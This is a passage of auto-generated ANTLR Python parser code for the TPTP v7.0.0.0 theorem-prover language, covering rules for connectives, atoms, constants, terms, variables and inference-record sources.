localctx = tptp_v7_0_0_0Parser.Fof_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 262, self.RULE_fof_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1313
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Forall or _la==tptp_v7_0_0_0Parser.Exists):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Binary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Iff(self):
return self.getToken(tptp_v7_0_0_0Parser.Iff, 0)
def Impl(self):
return self.getToken(tptp_v7_0_0_0Parser.Impl, 0)
def If(self):
return self.getToken(tptp_v7_0_0_0Parser.If, 0)
def Niff(self):
return self.getToken(tptp_v7_0_0_0Parser.Niff, 0)
def Nor(self):
return self.getToken(tptp_v7_0_0_0Parser.Nor, 0)
def Nand(self):
return self.getToken(tptp_v7_0_0_0Parser.Nand, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_binary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBinary_connective" ):
listener.enterBinary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBinary_connective" ):
listener.exitBinary_connective(self)
def binary_connective(self):
localctx = tptp_v7_0_0_0Parser.Binary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 264, self.RULE_binary_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1315
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << tptp_v7_0_0_0Parser.Iff) | (1 << tptp_v7_0_0_0Parser.Impl) | (1 << tptp_v7_0_0_0Parser.If) | (1 << tptp_v7_0_0_0Parser.Niff) | (1 << tptp_v7_0_0_0Parser.Nor) | (1 << tptp_v7_0_0_0Parser.Nand))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Assoc_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_assoc_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssoc_connective" ):
listener.enterAssoc_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssoc_connective" ):
listener.exitAssoc_connective(self)
def assoc_connective(self):
localctx = tptp_v7_0_0_0Parser.Assoc_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 266, self.RULE_assoc_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1317
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Or or _la==tptp_v7_0_0_0Parser.And):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Not(self):
return self.getToken(tptp_v7_0_0_0Parser.Not, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUnary_connective" ):
listener.enterUnary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUnary_connective" ):
listener.exitUnary_connective(self)
def unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 268, self.RULE_unary_connective)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1319
self.match(tptp_v7_0_0_0Parser.Not)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def type_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Type_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_type_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterType_constant" ):
listener.enterType_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitType_constant" ):
listener.exitType_constant(self)
def type_constant(self):
localctx = tptp_v7_0_0_0Parser.Type_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 270, self.RULE_type_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1321
self.type_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_type_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterType_functor" ):
listener.enterType_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitType_functor" ):
listener.exitType_functor(self)
def type_functor(self):
localctx = tptp_v7_0_0_0Parser.Type_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 272, self.RULE_type_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1323
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_type" ):
listener.enterDefined_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_type" ):
listener.exitDefined_type(self)
def defined_type(self):
localctx = tptp_v7_0_0_0Parser.Defined_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 274, self.RULE_defined_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1325
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_system_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_system_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_type" ):
listener.enterSystem_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_type" ):
listener.exitSystem_type(self)
def system_type(self):
localctx = tptp_v7_0_0_0Parser.System_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 276, self.RULE_system_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1327
self.atomic_system_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AtomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def untyped_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Untyped_atomContext,0)
def defined_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_constantContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtom" ):
listener.enterAtom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtom" ):
listener.exitAtom(self)
def atom(self):
localctx = tptp_v7_0_0_0Parser.AtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 278, self.RULE_atom)
try:
self.state = 1331
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1329
self.untyped_atom()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1330
self.defined_constant()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Untyped_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.ConstantContext,0)
def system_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_constantContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_untyped_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUntyped_atom" ):
listener.enterUntyped_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUntyped_atom" ):
listener.exitUntyped_atom(self)
def untyped_atom(self):
localctx = tptp_v7_0_0_0Parser.Untyped_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 280, self.RULE_untyped_atom)
try:
self.state = 1335
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1333
self.constant()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1334
self.system_constant()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_propositionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_proposition
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_proposition" ):
listener.enterDefined_proposition(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_proposition" ):
listener.exitDefined_proposition(self)
def defined_proposition(self):
localctx = tptp_v7_0_0_0Parser.Defined_propositionContext(self, self._ctx, self.state)
self.enterRule(localctx, 282, self.RULE_defined_proposition)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1337
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_predicateContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Dollar_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Dollar_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_predicate
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_predicate" ):
listener.enterDefined_predicate(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_predicate" ):
listener.exitDefined_predicate(self)
def defined_predicate(self):
localctx = tptp_v7_0_0_0Parser.Defined_predicateContext(self, self._ctx, self.state)
self.enterRule(localctx, 284, self.RULE_defined_predicate)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1339
self.match(tptp_v7_0_0_0Parser.Dollar_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_infix_predContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_infix_pred
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_infix_pred" ):
listener.enterDefined_infix_pred(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_infix_pred" ):
listener.exitDefined_infix_pred(self)
def defined_infix_pred(self):
localctx = tptp_v7_0_0_0Parser.Defined_infix_predContext(self, self._ctx, self.state)
self.enterRule(localctx, 286, self.RULE_defined_infix_pred)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1341
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.Infix_equality or _la==tptp_v7_0_0_0Parser.Assignment):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ConstantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterConstant" ):
listener.enterConstant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitConstant" ):
listener.exitConstant(self)
def constant(self):
localctx = tptp_v7_0_0_0Parser.ConstantContext(self, self._ctx, self.state)
self.enterRule(localctx, 288, self.RULE_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1343
self.functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctor" ):
listener.enterFunctor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctor" ):
listener.exitFunctor(self)
def functor(self):
localctx = tptp_v7_0_0_0Parser.FunctorContext(self, self._ctx, self.state)
self.enterRule(localctx, 290, self.RULE_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1345
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_constant" ):
listener.enterSystem_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_constant" ):
listener.exitSystem_constant(self)
def system_constant(self):
localctx = tptp_v7_0_0_0Parser.System_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 292, self.RULE_system_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1347
self.system_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class System_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_system_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_system_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_system_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSystem_functor" ):
listener.enterSystem_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSystem_functor" ):
listener.exitSystem_functor(self)
def system_functor(self):
localctx = tptp_v7_0_0_0Parser.System_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 294, self.RULE_system_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1349
self.atomic_system_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_constantContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_constant
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_constant" ):
listener.enterDefined_constant(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_constant" ):
listener.exitDefined_constant(self)
def defined_constant(self):
localctx = tptp_v7_0_0_0Parser.Defined_constantContext(self, self._ctx, self.state)
self.enterRule(localctx, 296, self.RULE_defined_constant)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1351
self.defined_functor()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_functorContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_defined_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_defined_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_functor
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_functor" ):
listener.enterDefined_functor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_functor" ):
listener.exitDefined_functor(self)
def defined_functor(self):
localctx = tptp_v7_0_0_0Parser.Defined_functorContext(self, self._ctx, self.state)
self.enterRule(localctx, 298, self.RULE_defined_functor)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1353
self.atomic_defined_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Defined_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def number(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NumberContext,0)
def Distinct_object(self):
return self.getToken(tptp_v7_0_0_0Parser.Distinct_object, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_defined_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDefined_term" ):
listener.enterDefined_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDefined_term" ):
listener.exitDefined_term(self)
def defined_term(self):
localctx = tptp_v7_0_0_0Parser.Defined_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 300, self.RULE_defined_term)
try:
self.state = 1357
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer]:
self.enterOuterAlt(localctx, 1)
self.state = 1355
self.number()
pass
elif token in [tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1356
self.match(tptp_v7_0_0_0Parser.Distinct_object)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Upper_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Upper_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariable" ):
listener.enterVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariable" ):
listener.exitVariable(self)
def variable(self):
localctx = tptp_v7_0_0_0Parser.VariableContext(self, self._ctx, self.state)
self.enterRule(localctx, 302, self.RULE_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1359
self.match(tptp_v7_0_0_0Parser.Upper_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def dag_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Dag_sourceContext,0)
def internal_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Internal_sourceContext,0)
def external_source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.External_sourceContext,0)
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def sources(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourcesContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSource" ):
listener.enterSource(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSource" ):
listener.exitSource(self)
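    # source: the alternatives (dag_source, internal_source, external_source,
    # a bare Lower_word, or a bracketed list of sources) can share prefixes,
    # so the alternative is chosen by adaptive prediction rather than by a
    # one-token lookahead switch.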
def source(self):
localctx = tptp_v7_0_0_0Parser.SourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 304, self.RULE_source)
try:
self.state = 1369
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,98,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1361
self.dag_source()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1362
self.internal_source()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1363
self.external_source()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 1364
self.match(tptp_v7_0_0_0Parser.Lower_word)
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 1365
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1366
self.sources()
self.state = 1367
self.match(tptp_v7_0_0_0Parser.T__12)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SourcesContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.SourceContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_sources
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSources" ):
listener.enterSources(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSources" ):
listener.exitSources(self)
def sources(self):
localctx = tptp_v7_0_0_0Parser.SourcesContext(self, self._ctx, self.state)
self.enterRule(localctx, 306, self.RULE_sources)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1371
self.source()
self.state = 1376
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1372
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1373
self.source()
self.state = 1378
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Dag_sourceContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def inference_record(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_recordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_dag_source
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDag_source" ):
listener.enterDag_source(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDag_source" ):
listener.exitDag_source(self)
def dag_source(self):
localctx = tptp_v7_0_0_0Parser.Dag_sourceContext(self, self._ctx, self.state)
self.enterRule(localctx, 308, self.RULE_dag_source)
try:
self.state = 1381
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1379
self.name()
pass
elif token in [tptp_v7_0_0_0Parser.T__26]:
self.enterOuterAlt(localctx, 2)
self.state = 1380
self.inference_record()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
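# inference_record: the 'inference(rule, useful_info, parents)' record of the TPTP annotation syntax.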
class Inference_recordContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def inference_rule(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_ruleContext,0)
def useful_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Useful_infoContext,0)
def inference_parents(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Inference_parentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_record
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_record" ):
listener.enterInference_record(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_record" ):
listener.exitInference_record(self)
def inference_record(self):
localctx = tptp_v7_0_0_0Parser.Inference_recordContext(self, self._ctx, self.state)
self.enterRule(localctx, 310, self.RULE_inference_record)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1383
self.match(tptp_v7_0_0_0Parser.T__26)
self.state = 1384
self.inference_rule()
self.state = 1385
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1386
self.useful_info()
self.state = 1387
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1388
self.inference_parents()
self.state = 1389
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Inference_ruleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atomic_word(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Atomic_wordContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_rule
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_rule" ):
listener.enterInference_rule(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_rule" ):
listener.exitInference_rule(self)
def inference_rule(self):
localctx = tptp_v7_0_0_0Parser.Inference_ruleContext(self, self._ctx, self.state)
self.enterRule(localctx, 312, self.RULE_inference_rule)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1391
self.atomic_word()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
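# inference_parents: the empty list '[]' or a bracketed <parent_list>.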
class Inference_parentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parent_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Parent_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_inference_parents
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInference_parents" ):
listener.enterInference_parents(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInference_parents" ):
listener.exitInference_parents(self)
def inference_parents(self):
